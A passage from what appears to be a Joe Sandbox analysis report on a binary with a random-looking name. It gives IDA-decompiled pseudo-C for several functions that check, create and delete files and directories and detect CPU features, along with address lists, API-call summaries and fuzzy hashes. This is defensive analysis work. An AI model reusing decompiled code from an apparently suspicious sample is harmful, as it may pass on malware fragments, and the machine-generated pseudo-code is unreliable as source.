                                                                                                                                      					E01302755(_t15, _t80, _t103);
                                                                                                                                      					_t16 = _t89 - 0x2c; // 0x1306b15
                                                                                                                                      					_t23 = E01302755(_t16, _t80, _t103);
                                                                                                                                      				} else {
                                                                                                                                      					_t99 = _t52;
                                                                                                                                      					if(_t52 != 0) {
                                                                                                                                      						goto L2;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				_t17 = _t89 - 0xc; // 0x89645e5f
                                                                                                                                      				 *[fs:0x0] =  *_t17;
                                                                                                                                      				return _t23;
                                                                                                                                      			}














                                                                                                                                      0x01304386
                                                                                                                                      0x01304386
                                                                                                                                      0x0130438b
                                                                                                                                      0x01304390
                                                                                                                                      0x01304394
                                                                                                                                      0x0130439f
                                                                                                                                      0x013043af
                                                                                                                                      0x013043b4
                                                                                                                                      0x013043b8
                                                                                                                                      0x013043c2
                                                                                                                                      0x013043c2
                                                                                                                                      0x013043c5
                                                                                                                                      0x013043ca
                                                                                                                                      0x013043ce
                                                                                                                                      0x013043ce
                                                                                                                                      0x013043d4
                                                                                                                                      0x013043d9
                                                                                                                                      0x013043dd
                                                                                                                                      0x013043df
                                                                                                                                      0x013044b0
                                                                                                                                      0x013044b0
                                                                                                                                      0x013044b2
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013043e5
                                                                                                                                      0x013043e5
                                                                                                                                      0x013043e5
                                                                                                                                      0x013043eb
                                                                                                                                      0x013043f2
                                                                                                                                      0x013043fb
                                                                                                                                      0x013043fc
                                                                                                                                      0x01304404
                                                                                                                                      0x01304413
                                                                                                                                      0x01304422
                                                                                                                                      0x0130443a
                                                                                                                                      0x01304443
                                                                                                                                      0x01304448
                                                                                                                                      0x0130444c
                                                                                                                                      0x01304454
                                                                                                                                      0x01304458
                                                                                                                                      0x0130445d
                                                                                                                                      0x0130446d
                                                                                                                                      0x01304472
                                                                                                                                      0x0130447c
                                                                                                                                      0x00000000
                                                                                                                                      0x0130447e
                                                                                                                                      0x0130447e
                                                                                                                                      0x01304480
                                                                                                                                      0x013044b4
                                                                                                                                      0x013044b4
                                                                                                                                      0x013044b7
                                                                                                                                      0x01304482
                                                                                                                                      0x0130448d
                                                                                                                                      0x0130449c
                                                                                                                                      0x013044a1
                                                                                                                                      0x013044ab
                                                                                                                                      0x00000000
                                                                                                                                      0x013044ab
                                                                                                                                      0x01304480
                                                                                                                                      0x0130447c
                                                                                                                                      0x013044bc
                                                                                                                                      0x013044bf
                                                                                                                                      0x013044c4
                                                                                                                                      0x013044c7
                                                                                                                                      0x013043ba
                                                                                                                                      0x013043ba
                                                                                                                                      0x013043bc
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013043bc
                                                                                                                                      0x013044cc
                                                                                                                                      0x013044d1
                                                                                                                                      0x013044da

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DeleteFileH_prolog
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3283489231-0
                                                                                                                                      • Opcode ID: 797038cfe297ca7689b8f11cf9a92383595a93a8b90debab1a2129b27dfad5af
                                                                                                                                      • Instruction ID: ee478ea4eb7f055633e76c2d43c1d5d35ed0ece8c963862fc6f4daa6545eedc6
                                                                                                                                      • Opcode Fuzzy Hash: 797038cfe297ca7689b8f11cf9a92383595a93a8b90debab1a2129b27dfad5af
                                                                                                                                      • Instruction Fuzzy Hash: 20318D25F002169ADF07F7FC997CBAE66E59F7560CF548418DA416B2C2EE742F0883A1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                      			E013019C4(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				void* _t34;
                                                                                                                                      				int _t38;
                                                                                                                                      				void* _t42;
                                                                                                                                      				void* _t45;
                                                                                                                                      				void* _t49;
                                                                                                                                      				void* _t54;
                                                                                                                                      				void* _t57;
                                                                                                                                      				void* _t59;
                                                                                                                                      				void* _t65;
                                                                                                                                      				void* _t92;
                                                                                                                                      				void* _t98;
                                                                                                                                      				void* _t100;
                                                                                                                                      				void* _t101;
                                                                                                                                      
                                                                                                                                      				_t90 = __edx;
                                                                                                                                      				_t65 = __ecx;
                                                                                                                                      				E01323174(E0132322E, __edx, __eflags);
                                                                                                                                      				_t101 = _t100 - 0x464;
                                                                                                                                      				_t92 = _t65;
                                                                                                                                      				E0130295B(_t98 - 0x28);
                                                                                                                                      				 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
                                                                                                                                      				_t34 = E01302709();
                                                                                                                                      				E013040FE(_t98 - 0x470, E0130282E(_t92 + 0xd8, __eflags), _t34);
                                                                                                                                      				_t95 = _t92 + 0x68;
                                                                                                                                      				_t38 = PathFileExistsW(E01302712(_t92 + 0x68, __eflags)); // executed
                                                                                                                                      				_t106 = _t38;
                                                                                                                                      				if(_t38 != 0) {
                                                                                                                                      					E0130295B(_t98 - 0x40);
                                                                                                                                      					 *(_t98 - 4) = 1;
                                                                                                                                      					E01302712(_t95, _t106);
                                                                                                                                      					_t90 = _t98 - 0x40;
                                                                                                                                      					_t57 = E01307B34(_t98 - 0x40);
                                                                                                                                      					_t107 = _t57;
                                                                                                                                      					if(_t57 != 0) {
                                                                                                                                      						_t59 = E01302709();
                                                                                                                                      						E013028B4(_t98 - 0x28, _t90, E0130421F(_t98 - 0x470, _t107, _t98 - 0x58, E0130282E(_t98 - 0x40, _t107), _t59));
                                                                                                                                      						E013028AF(_t98 - 0x58, _t90, _t107);
                                                                                                                                      					}
                                                                                                                                      					 *(_t98 - 4) = 0;
                                                                                                                                      					E013028AF(_t98 - 0x40, _t90, _t107);
                                                                                                                                      				}
                                                                                                                                      				_t108 = E01302709() + _t39;
                                                                                                                                      				_t42 = E01302937(_t98 - 0x58, E01302712(_t92 + 4, E01302709() + _t39), E01302709() + _t39);
                                                                                                                                      				 *(_t98 - 4) = 2;
                                                                                                                                      				E0130287D(_t98 - 0x28, E01302709() + _t39, _t42);
                                                                                                                                      				 *(_t98 - 4) = 0;
                                                                                                                                      				E013028AF(_t98 - 0x58, _t90, E01302709() + _t39);
                                                                                                                                      				_t45 = E01302709();
                                                                                                                                      				E0130421F(_t98 - 0x470, _t108, _t98 - 0x70, E0130282E(_t98 - 0x28, E01302709() + _t39), _t45);
                                                                                                                                      				 *(_t98 - 4) = 3;
                                                                                                                                      				_t49 = E01302712(_t95, _t108);
                                                                                                                                      				E0130296E(_t101 - 0x18, _t90, _t108, _t98 - 0x70);
                                                                                                                                      				E01307CB8(_t49);
                                                                                                                                      				E013028AF(_t98 - 0x70, _t90, _t108);
                                                                                                                                      				_t54 = E013028AF(_t98 - 0x28, _t90, _t108);
                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
                                                                                                                                      				return _t54;
                                                                                                                                      			}
















                                                                                                                                      0x013019c4
                                                                                                                                      0x013019c4
                                                                                                                                      0x013019c9
                                                                                                                                      0x013019ce
                                                                                                                                      0x013019d6
                                                                                                                                      0x013019db
                                                                                                                                      0x013019e0
                                                                                                                                      0x013019ea
                                                                                                                                      0x013019fc
                                                                                                                                      0x01301a01
                                                                                                                                      0x01301a0c
                                                                                                                                      0x01301a12
                                                                                                                                      0x01301a14
                                                                                                                                      0x01301a19
                                                                                                                                      0x01301a20
                                                                                                                                      0x01301a24
                                                                                                                                      0x01301a29
                                                                                                                                      0x01301a2e
                                                                                                                                      0x01301a33
                                                                                                                                      0x01301a35
                                                                                                                                      0x01301a3a
                                                                                                                                      0x01301a59
                                                                                                                                      0x01301a61
                                                                                                                                      0x01301a61
                                                                                                                                      0x01301a69
                                                                                                                                      0x01301a6d
                                                                                                                                      0x01301a6d
                                                                                                                                      0x01301a7a
                                                                                                                                      0x01301a86
                                                                                                                                      0x01301a8f
                                                                                                                                      0x01301a93
                                                                                                                                      0x01301a9b
                                                                                                                                      0x01301a9f
                                                                                                                                      0x01301aa7
                                                                                                                                      0x01301abd
                                                                                                                                      0x01301ac4
                                                                                                                                      0x01301ac8
                                                                                                                                      0x01301ad8
                                                                                                                                      0x01301adf
                                                                                                                                      0x01301aea
                                                                                                                                      0x01301af2
                                                                                                                                      0x01301afb
                                                                                                                                      0x01301b04

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 013019C9
                                                                                                                                      • PathFileExistsW.KERNELBASE(00000000,00000000,00000000,?,?), ref: 01301A0C
                                                                                                                                        • Part of subcall function 01307B34: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,01301A33), ref: 01307B4D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$CreateExistsH_prologPath
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1275465817-0
                                                                                                                                      • Opcode ID: c304561e73f947f1eed011ae8a9409a6d2b542e2b2b0e6589868407dce19c615
                                                                                                                                      • Instruction ID: 16e59472ec7a3a0c50ef2fe102e2e340002947215e116ca266c12917b2b4aa14
                                                                                                                                      • Opcode Fuzzy Hash: c304561e73f947f1eed011ae8a9409a6d2b542e2b2b0e6589868407dce19c615
                                                                                                                                      • Instruction Fuzzy Hash: 1A312C75900116DADB06F7BCC978AEEBBB8AF34608F040059D502731C2EF346B0AC7A1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                      			E01304753(intOrPtr __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* _t29;
                                                                                                                                      				void* _t34;
                                                                                                                                      				int _t38;
                                                                                                                                      				intOrPtr _t52;
                                                                                                                                      				void* _t78;
                                                                                                                                      				intOrPtr _t82;
                                                                                                                                      				void* _t84;
                                                                                                                                      				void* _t86;
                                                                                                                                      				void* _t87;
                                                                                                                                      
                                                                                                                                      				_t91 = __eflags;
                                                                                                                                      				_t75 = __edx;
                                                                                                                                      				_t52 = __ecx;
                                                                                                                                      				E01323174(E0132341C, __edx, __eflags);
                                                                                                                                      				_t87 = _t86 - 0x9c;
                                                                                                                                      				_t82 = _t52;
                                                                                                                                      				_t1 = _t84 - 0x90; // 0x1306ab1
                                                                                                                                      				_push(_t78);
                                                                                                                                      				 *((intOrPtr*)(_t84 - 0x14)) = _t82;
                                                                                                                                      				_t29 = E01306F77(_t1, _t75, __eflags);
                                                                                                                                      				 *(_t84 - 4) =  *(_t84 - 4) & 0x00000000;
                                                                                                                                      				_push(E0130282E(_t29, __eflags));
                                                                                                                                      				_t5 = _t84 - 0x48; // 0x1306af9, executed
                                                                                                                                      				E01307630(_t5, _t75, __eflags); // executed
                                                                                                                                      				_t6 = _t84 - 0x90; // 0x1306ab1
                                                                                                                                      				 *(_t84 - 4) = 2;
                                                                                                                                      				E013028AF(_t6, _t75, _t91);
                                                                                                                                      				_t8 = _t84 - 0x60; // 0x1306ae1
                                                                                                                                      				E013046FA(_t8, _t75);
                                                                                                                                      				_push(0x1329c08);
                                                                                                                                      				_t9 = _t84 - 0x48; // 0x1306af9
                                                                                                                                      				 *(_t84 - 4) = 3;
                                                                                                                                      				_t11 = _t84 - 0xa8; // 0x1306a99
                                                                                                                                      				_t34 = E013031D6(_t11, _t9, _t91);
                                                                                                                                      				_t12 = _t84 - 0x60; // 0x1306ae1
                                                                                                                                      				 *(_t84 - 4) = 4;
                                                                                                                                      				_t77 = _t34;
                                                                                                                                      				_t14 = _t84 - 0x30; // 0x1306b11
                                                                                                                                      				E013033AA(_t14, _t34, _t78, _t91, _t12);
                                                                                                                                      				_t15 = _t84 - 0xa8; // 0x1306a99
                                                                                                                                      				 *(_t84 - 4) = 6;
                                                                                                                                      				E01302755(_t15, _t34, _t91);
                                                                                                                                      				_t17 = _t84 - 0x48; // 0x1306af9
                                                                                                                                      				_t65 = _t17;
                                                                                                                                      				_t38 = CreateDirectoryW(E01302712(_t17, _t91), 0); // executed
                                                                                                                                      				_t92 = _t38;
                                                                                                                                      				if(_t38 != 0) {
                                                                                                                                      					_t18 = _t84 - 0x78; // 0x1306ac9
                                                                                                                                      					E0130250A(_t65, _t77, _t78, __eflags, _t18); // executed
                                                                                                                                      					 *(_t84 - 4) = 7;
                                                                                                                                      					_t20 = _t84 - 0x78; // 0x1306ac9
                                                                                                                                      					_t21 = _t84 - 0x30; // 0x1306b11
                                                                                                                                      					E01302814(_t87 - 0x18, _t77, __eflags, _t20);
                                                                                                                                      					E01307CE4(_t21, __eflags);
                                                                                                                                      					E01302792(_t82, _t21);
                                                                                                                                      					_t22 = _t84 - 0x78; // 0x1306ac9
                                                                                                                                      					E01302755(_t22, _t77, __eflags);
                                                                                                                                      				} else {
                                                                                                                                      					E013027E1(_t82, _t77, 0x1329c7c);
                                                                                                                                      				}
                                                                                                                                      				_t23 = _t84 - 0x30; // 0x1306b11
                                                                                                                                      				E01302755(_t23, _t77, _t92);
                                                                                                                                      				_t24 = _t84 - 0x60; // 0x1306ae1
                                                                                                                                      				E01302755(_t24, _t77, _t92);
                                                                                                                                      				_t25 = _t84 - 0x48; // 0x1306af9
                                                                                                                                      				E01302755(_t25, _t77, _t92);
                                                                                                                                      				_t26 = _t84 - 0xc; // 0x89645e5f
                                                                                                                                      				 *[fs:0x0] =  *_t26;
                                                                                                                                      				return _t82;
                                                                                                                                      			}













                                                                                                                                      0x01304753
                                                                                                                                      0x01304753
                                                                                                                                      0x01304753
                                                                                                                                      0x01304758
                                                                                                                                      0x0130475d
                                                                                                                                      0x01304764
                                                                                                                                      0x01304766
                                                                                                                                      0x0130476c
                                                                                                                                      0x0130476d
                                                                                                                                      0x01304770
                                                                                                                                      0x01304775
                                                                                                                                      0x01304780
                                                                                                                                      0x01304781
                                                                                                                                      0x01304784
                                                                                                                                      0x0130478a
                                                                                                                                      0x01304790
                                                                                                                                      0x01304794
                                                                                                                                      0x01304799
                                                                                                                                      0x0130479c
                                                                                                                                      0x013047a1
                                                                                                                                      0x013047a6
                                                                                                                                      0x013047a9
                                                                                                                                      0x013047ad
                                                                                                                                      0x013047b3
                                                                                                                                      0x013047b9
                                                                                                                                      0x013047bc
                                                                                                                                      0x013047c1
                                                                                                                                      0x013047c3
                                                                                                                                      0x013047c6
                                                                                                                                      0x013047cc
                                                                                                                                      0x013047d2
                                                                                                                                      0x013047d6
                                                                                                                                      0x013047dd
                                                                                                                                      0x013047dd
                                                                                                                                      0x013047e6
                                                                                                                                      0x013047ec
                                                                                                                                      0x013047ee
                                                                                                                                      0x013047fe
                                                                                                                                      0x01304802
                                                                                                                                      0x0130480a
                                                                                                                                      0x0130480e
                                                                                                                                      0x01304813
                                                                                                                                      0x01304817
                                                                                                                                      0x0130481e
                                                                                                                                      0x0130482b
                                                                                                                                      0x01304830
                                                                                                                                      0x01304833
                                                                                                                                      0x013047f0
                                                                                                                                      0x013047f7
                                                                                                                                      0x013047f7
                                                                                                                                      0x01304838
                                                                                                                                      0x0130483b
                                                                                                                                      0x01304840
                                                                                                                                      0x01304843
                                                                                                                                      0x01304848
                                                                                                                                      0x0130484b
                                                                                                                                      0x01304850
                                                                                                                                      0x01304856
                                                                                                                                      0x0130485f

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01304758
                                                                                                                                        • Part of subcall function 01306F77: __EH_prolog.LIBCMT ref: 01306F7C
                                                                                                                                        • Part of subcall function 01306F77: GetCurrentProcessId.KERNEL32(00000000,74D0FBB0,00000000), ref: 01306FB7
                                                                                                                                        • Part of subcall function 01307630: __EH_prolog.LIBCMT ref: 01307635
                                                                                                                                        • Part of subcall function 013046FA: GetLocalTime.KERNEL32(?), ref: 0130470D
                                                                                                                                        • Part of subcall function 013031D6: __EH_prolog.LIBCMT ref: 013031DB
                                                                                                                                      • CreateDirectoryW.KERNELBASE(00000000,00000000,F44D8BFF,00000000), ref: 013047E6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prolog$CreateCurrentDirectoryLocalProcessTime
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2470282753-0
                                                                                                                                      • Opcode ID: 34c0f82b33801bb5301334c0b661ee5059270cf8a4f8f5c47eaf6497b45cd368
                                                                                                                                      • Instruction ID: 80fb927a2c9f0638a40004121361e8299eb11ecc0b39d11e7065fdfde905c2a0
                                                                                                                                      • Opcode Fuzzy Hash: 34c0f82b33801bb5301334c0b661ee5059270cf8a4f8f5c47eaf6497b45cd368
                                                                                                                                      • Instruction Fuzzy Hash: 6F213031A042299ADF16F7A8C868BEEB7B9AF74608F50405DD406632C1EF746B09C751
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 73%
                                                                                                                                      			E01309967(void* __ebx, void* __ecx, signed char __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                      				signed int _v16;
                                                                                                                                      				signed int _v20;
                                                                                                                                      				signed int _v24;
                                                                                                                                      				signed char _v28;
                                                                                                                                      				signed int _v32;
                                                                                                                                      				signed int _v36;
                                                                                                                                      				signed int _v40;
                                                                                                                                      				signed char _v44;
                                                                                                                                      				signed int _v48;
                                                                                                                                      				void* _t51;
                                                                                                                                      				signed int _t52;
                                                                                                                                      				signed int _t56;
                                                                                                                                      				signed int _t69;
                                                                                                                                      				signed int _t72;
                                                                                                                                      				signed int _t73;
                                                                                                                                      				signed int _t74;
                                                                                                                                      				intOrPtr _t75;
                                                                                                                                      				signed int _t77;
                                                                                                                                      				void* _t81;
                                                                                                                                      				intOrPtr _t85;
                                                                                                                                      				intOrPtr* _t87;
                                                                                                                                      				signed char _t88;
                                                                                                                                      				intOrPtr* _t90;
                                                                                                                                      				void* _t91;
                                                                                                                                      				void* _t92;
                                                                                                                                      				signed char _t100;
                                                                                                                                      				void* _t101;
                                                                                                                                      				intOrPtr* _t102;
                                                                                                                                      				signed int _t105;
                                                                                                                                      				signed int _t108;
                                                                                                                                      				void* _t109;
                                                                                                                                      				void* _t114;
                                                                                                                                      				void* _t115;
                                                                                                                                      				void* _t117;
                                                                                                                                      
                                                                                                                                      				_t109 = __esi;
                                                                                                                                      				_t101 = __edi;
                                                                                                                                      				_t100 = __edx;
                                                                                                                                      				_t91 = __ecx;
                                                                                                                                      				_t81 = __ebx;
                                                                                                                                      				while(1) {
                                                                                                                                      					_push(_a4);
                                                                                                                                      					_t51 = E01311119(_t91); // executed
                                                                                                                                      					_pop(_t92);
                                                                                                                                      					if(_t51 != 0) {
                                                                                                                                      						return _t51;
                                                                                                                                      					}
                                                                                                                                      					_t52 = E0131245E(_t81, _t92, _t101, _t109, __eflags, _a4);
                                                                                                                                      					_pop(_t91);
                                                                                                                                      					__eflags = _t52;
                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                      						__eflags = _a4 - 0xffffffff;
                                                                                                                                      						if(_a4 != 0xffffffff) {
                                                                                                                                      							_push(_t114);
                                                                                                                                      							_t114 = _t117;
                                                                                                                                      							_t117 = _t117 - 0xc;
                                                                                                                                      							E01309547( &_v20);
                                                                                                                                      							E0130C79F( &_v20, 0x132bb88);
                                                                                                                                      							asm("int3");
                                                                                                                                      						}
                                                                                                                                      						_push(_t114);
                                                                                                                                      						_t115 = _t117;
                                                                                                                                      						E0130A0A7( &_v20);
                                                                                                                                      						E0130C79F( &_v20, 0x132bcd4);
                                                                                                                                      						asm("int3");
                                                                                                                                      						_push(_t115);
                                                                                                                                      						 *0x132eafc =  *0x132eafc & 0x00000000;
                                                                                                                                      						_push(_t81);
                                                                                                                                      						 *0x132e010 =  *0x132e010 | 1;
                                                                                                                                      						_t56 = IsProcessorFeaturePresent(0xa);
                                                                                                                                      						__eflags = _t56;
                                                                                                                                      						if(_t56 != 0) {
                                                                                                                                      							_v28 = _v28 & 0x00000000;
                                                                                                                                      							 *0x132e010 =  *0x132e010 | 0x00000002;
                                                                                                                                      							_push(_t109);
                                                                                                                                      							_push(_t101);
                                                                                                                                      							 *0x132eafc = 1;
                                                                                                                                      							_t102 =  &_v48;
                                                                                                                                      							_push(1);
                                                                                                                                      							asm("cpuid");
                                                                                                                                      							_pop(_t85);
                                                                                                                                      							 *_t102 = 0;
                                                                                                                                      							 *((intOrPtr*)(_t102 + 4)) = 1;
                                                                                                                                      							 *((intOrPtr*)(_t102 + 8)) = 0;
                                                                                                                                      							 *(_t102 + 0xc) = _t100;
                                                                                                                                      							_v24 = _v48;
                                                                                                                                      							_v20 = _v36 ^ 0x49656e69;
                                                                                                                                      							_v16 = _v40 ^ 0x6c65746e;
                                                                                                                                      							_push(1);
                                                                                                                                      							asm("cpuid");
                                                                                                                                      							_t87 =  &_v48;
                                                                                                                                      							 *_t87 = 1;
                                                                                                                                      							__eflags = _v16 | _v20 | _v44 ^ 0x756e6547;
                                                                                                                                      							 *((intOrPtr*)(_t87 + 4)) = _t85;
                                                                                                                                      							 *((intOrPtr*)(_t87 + 8)) = 0;
                                                                                                                                      							 *(_t87 + 0xc) = _t100;
                                                                                                                                      							if((_v16 | _v20 | _v44 ^ 0x756e6547) != 0) {
                                                                                                                                      								L17:
                                                                                                                                      								_t105 =  *0x132eb00; // 0x2
                                                                                                                                      							} else {
                                                                                                                                      								_t77 = _v48 & 0x0fff3ff0;
                                                                                                                                      								__eflags = _t77 - 0x106c0;
                                                                                                                                      								if(_t77 == 0x106c0) {
                                                                                                                                      									L16:
                                                                                                                                      									_t108 =  *0x132eb00; // 0x2
                                                                                                                                      									_t105 = _t108 | 0x00000001;
                                                                                                                                      									 *0x132eb00 = _t105;
                                                                                                                                      								} else {
                                                                                                                                      									__eflags = _t77 - 0x20660;
                                                                                                                                      									if(_t77 == 0x20660) {
                                                                                                                                      										goto L16;
                                                                                                                                      									} else {
                                                                                                                                      										__eflags = _t77 - 0x20670;
                                                                                                                                      										if(_t77 == 0x20670) {
                                                                                                                                      											goto L16;
                                                                                                                                      										} else {
                                                                                                                                      											__eflags = _t77 - 0x30650;
                                                                                                                                      											if(_t77 == 0x30650) {
                                                                                                                                      												goto L16;
                                                                                                                                      											} else {
                                                                                                                                      												__eflags = _t77 - 0x30660;
                                                                                                                                      												if(_t77 == 0x30660) {
                                                                                                                                      													goto L16;
                                                                                                                                      												} else {
                                                                                                                                      													__eflags = _t77 - 0x30670;
                                                                                                                                      													if(_t77 != 0x30670) {
                                                                                                                                      														goto L17;
                                                                                                                                      													} else {
                                                                                                                                      														goto L16;
                                                                                                                                      													}
                                                                                                                                      												}
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							__eflags = _v24 - 7;
                                                                                                                                      							_t69 = _v40;
                                                                                                                                      							_v16 = _t69;
                                                                                                                                      							if(_v24 < 7) {
                                                                                                                                      								_t88 = _v28;
                                                                                                                                      							} else {
                                                                                                                                      								_t75 = 7;
                                                                                                                                      								_push(_t87);
                                                                                                                                      								asm("cpuid");
                                                                                                                                      								_t90 =  &_v48;
                                                                                                                                      								 *_t90 = _t75;
                                                                                                                                      								_t69 = _v16;
                                                                                                                                      								 *((intOrPtr*)(_t90 + 4)) = _t87;
                                                                                                                                      								 *((intOrPtr*)(_t90 + 8)) = 0;
                                                                                                                                      								 *(_t90 + 0xc) = _t100;
                                                                                                                                      								_t88 = _v44;
                                                                                                                                      								__eflags = _t88 & 0x00000200;
                                                                                                                                      								if((_t88 & 0x00000200) != 0) {
                                                                                                                                      									 *0x132eb00 = _t105 | 0x00000002;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							__eflags = _t69 & 0x00100000;
                                                                                                                                      							if((_t69 & 0x00100000) != 0) {
                                                                                                                                      								 *0x132e010 =  *0x132e010 | 0x00000004;
                                                                                                                                      								 *0x132eafc = 2;
                                                                                                                                      								__eflags = _t69 & 0x08000000;
                                                                                                                                      								if((_t69 & 0x08000000) != 0) {
                                                                                                                                      									__eflags = _t69 & 0x10000000;
                                                                                                                                      									if((_t69 & 0x10000000) != 0) {
                                                                                                                                      										asm("xgetbv");
                                                                                                                                      										_v32 = _t69;
                                                                                                                                      										_v28 = _t100;
                                                                                                                                      										__eflags = (_v32 & 0x00000006) - 6;
                                                                                                                                      										if((_v32 & 0x00000006) == 6) {
                                                                                                                                      											_t72 =  *0x132e010; // 0x2f
                                                                                                                                      											_t73 = _t72 | 0x00000008;
                                                                                                                                      											 *0x132eafc = 3;
                                                                                                                                      											 *0x132e010 = _t73;
                                                                                                                                      											__eflags = _t88 & 0x00000020;
                                                                                                                                      											if((_t88 & 0x00000020) != 0) {
                                                                                                                                      												_t74 = _t73 | 0x00000020;
                                                                                                                                      												__eflags = _t74;
                                                                                                                                      												 *0x132eafc = 5;
                                                                                                                                      												 *0x132e010 = _t74;
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						__eflags = 0;
                                                                                                                                      						return 0;
                                                                                                                                      					} else {
                                                                                                                                      						continue;
                                                                                                                                      					}
                                                                                                                                      					break;
                                                                                                                                      				}
                                                                                                                                      			}





































                                                                                                                                      0x01309967
                                                                                                                                      0x01309967
                                                                                                                                      0x01309967
                                                                                                                                      0x01309967
                                                                                                                                      0x01309967
                                                                                                                                      0x01309979
                                                                                                                                      0x01309979
                                                                                                                                      0x0130997c
                                                                                                                                      0x01309981
                                                                                                                                      0x01309984
                                                                                                                                      0x01309987
                                                                                                                                      0x01309987
                                                                                                                                      0x0130996f
                                                                                                                                      0x01309974
                                                                                                                                      0x01309975
                                                                                                                                      0x01309977
                                                                                                                                      0x01309988
                                                                                                                                      0x0130998c
                                                                                                                                      0x0130a0bf
                                                                                                                                      0x0130a0c0
                                                                                                                                      0x0130a0c2
                                                                                                                                      0x0130a0c8
                                                                                                                                      0x0130a0d6
                                                                                                                                      0x0130a0db
                                                                                                                                      0x0130a0db
                                                                                                                                      0x0130a0dc
                                                                                                                                      0x0130a0dd
                                                                                                                                      0x0130a0e5
                                                                                                                                      0x0130a0f3
                                                                                                                                      0x0130a0f8
                                                                                                                                      0x0130a0f9
                                                                                                                                      0x0130a0fc
                                                                                                                                      0x0130a106
                                                                                                                                      0x0130a10a
                                                                                                                                      0x0130a112
                                                                                                                                      0x0130a117
                                                                                                                                      0x0130a119
                                                                                                                                      0x0130a11f
                                                                                                                                      0x0130a125
                                                                                                                                      0x0130a12e
                                                                                                                                      0x0130a12f
                                                                                                                                      0x0130a130
                                                                                                                                      0x0130a136
                                                                                                                                      0x0130a139
                                                                                                                                      0x0130a13a
                                                                                                                                      0x0130a13e
                                                                                                                                      0x0130a13f
                                                                                                                                      0x0130a141
                                                                                                                                      0x0130a144
                                                                                                                                      0x0130a149
                                                                                                                                      0x0130a152
                                                                                                                                      0x0130a163
                                                                                                                                      0x0130a16e
                                                                                                                                      0x0130a174
                                                                                                                                      0x0130a175
                                                                                                                                      0x0130a17a
                                                                                                                                      0x0130a17d
                                                                                                                                      0x0130a185
                                                                                                                                      0x0130a187
                                                                                                                                      0x0130a18a
                                                                                                                                      0x0130a18d
                                                                                                                                      0x0130a190
                                                                                                                                      0x0130a1d5
                                                                                                                                      0x0130a1d5
                                                                                                                                      0x0130a192
                                                                                                                                      0x0130a195
                                                                                                                                      0x0130a19a
                                                                                                                                      0x0130a19f
